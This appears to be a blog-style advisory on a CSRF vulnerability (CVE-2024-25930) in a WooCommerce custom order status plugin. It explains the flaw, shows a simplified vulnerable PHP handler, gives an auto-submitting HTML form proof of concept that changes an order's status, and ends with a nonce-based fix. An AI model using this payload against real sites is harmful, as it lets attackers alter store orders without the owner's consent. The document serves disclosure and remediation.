CVE-2024-25930 - Exploiting CSRF in Nuggethon Custom Order Statuses for WooCommerce (<= 1.5.2)

On February 21, 2024, a serious security vulnerability was disclosed in the Nuggethon Custom Order Statuses for WooCommerce plugin, affecting all versions up to 1.5.2. Catalogued as CVE-2024-25930, this issue is a classic Cross-Site Request Forgery (CSRF). In this post, we’ll break down what the flaw is, how you could exploit it, and steps for both detection and mitigation—using easy-to-understand language and example code.

What’s the Plugin and What’s the Vulnerability?

Nuggethon Custom Order Statuses for WooCommerce lets shop owners add and manage custom order statuses within their WooCommerce stores. Unfortunately, the plugin didn’t properly check the authenticity of requests meant to update order statuses. This means a hacker could trick an admin user into clicking a bad link or visiting a malicious web page, and thereby make unwanted changes to order statuses.

Explaining CSRF Simply

CSRF means tricking a signed-in, low-guard admin into submitting an unwanted request to their own website—without them realizing. For plugins like this one, it’s dangerous: an attacker could, for example, move orders from "pending" to "completed," or delete custom statuses, just by luring a site admin to a malicious web page.

Here’s what the dangerous code flow looks like (stripped down for clarity)

// Hooked to admin page for updating status
function nuggethon_update_order_status() {
    // CSRF protection missing here!
    $order_id = $_POST['order_id'];
    $new_status = $_POST['new_status'];
    
    // No nonce check!
    wc_update_order_status($order_id, $new_status);
}
add_action('admin_post_update_order_status', 'nuggethon_update_order_status');

See how it just takes whatever values are POSTed, with no check to confirm that the request is legitimate? That’s what enables the CSRF.

How an Attacker Could Exploit This

Let’s say the vulnerable function is triggered when an admin is logged in and visits a crafted web page. The page could automatically submit form data to the WooCommerce site behind the scenes.

Example Exploit HTML

If the WordPress admin is logged in and visits a site controlled by the attacker, the attacker could use this code:

<form action="https://victim.com/wp-admin/admin-post.php"; method="POST" id="csrfForm">
  <input type="hidden" name="action" value="update_order_status">
  <input type="hidden" name="order_id" value="1234">
  <input type="hidden" name="new_status" value="completed">
</form>
<script>
  document.getElementById('csrfForm').submit();
</script>

This form will POST directly to the WooCommerce admin handler, updating the order status of order #1234 to "completed"—with zero confirmation required.

Stock levels or sales records might become inaccurate.

Especially in busy stores, this can have a direct dollar impact.

How to Check If You’re Vulnerable

1. Plugin Version: If you use Custom Order Statuses for WooCommerce version <= 1.5.2, you are at risk.
2. Try to replicate: While logged in as admin, build and load a simple HTML page like the one above, using your own site URL and a known order ID. If the status changes with no warning, the plugin is vulnerable.

How to Fix It

The fix is for the plugin to verify POST requests using a nonce (a one-time token). A patched code block should look like this:

function nuggethon_update_order_status() {
    if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'update_order_status')) {
        wp_die('Security check failed');
    }
    $order_id = $_POST['order_id'];
    $new_status = $_POST['new_status'];
    wc_update_order_status($order_id, $new_status);
}

Now, only legitimate admin page requests (with a correct nonce) can update order statuses.

Recommendations

- Upgrade immediately: Download the latest version when available via WordPress.org.

References and More Reading

- Original CVE Entry - cve.org
- Plugin Download & Changelog
- OWASP CSRF Guide

Conclusion

CVE-2024-25930 is a textbook CSRF bug, but it’s dangerous because admins are often logged in while browsing. Take this chance to update your plugins and review any you rely on—simple coding mistakes like this can have a big real-world impact.

If you run a WooCommerce store, time is of the essence—patch now!

Timeline

Published on: 02/29/2024 01:44:17 UTC
Last modified on: 02/29/2024 13:49:29 UTC